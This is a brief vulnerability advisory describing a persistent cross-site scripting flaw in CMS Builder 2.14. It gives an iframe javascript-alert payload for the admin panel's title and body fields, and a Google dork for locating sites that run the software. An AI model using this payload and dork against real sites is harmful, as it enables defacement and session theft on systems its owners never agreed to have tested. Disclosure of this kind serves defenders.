CMS Builder version 2.14 suffers from a persistent cross site scripting vulnerability.
20a61ebd6b6b400f8e102d7a3195cb2f4eb2b4151e9009465b3362d944384050
CMS Builder
vendor: http://www.interactivetools.com/
Version: CMS Builder 2.14
Author: Karthik R (3psil0nLambDa)
Email: Karthik.cupid@gmail.com
My blog: www.epsilonlambda.wordpress.com
Google dork: Website powered by CMS Builder
------------------------------------------------------------------------------------------------------------------------------------------------------------
Description about the CMS
With CMS Builder, you create your own customized CMS in minutes, even if you've never installed a web script before. You don't need to be a programmer: whether it's for your own site or a client's project, even a novice web developer can easily create a custom system for managing your whole site.
------------------------------------------------------------------------------------------------------------------------------------------------------------
* PERSISTENT XSS VULNERABILITY :
In the admin panel, input the TITLE and BODY with the following code, leading to Persistent XSS exploit in the CMS
Exploit: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
------------------------------------------------------------------------------------------------------------------------------------------------------------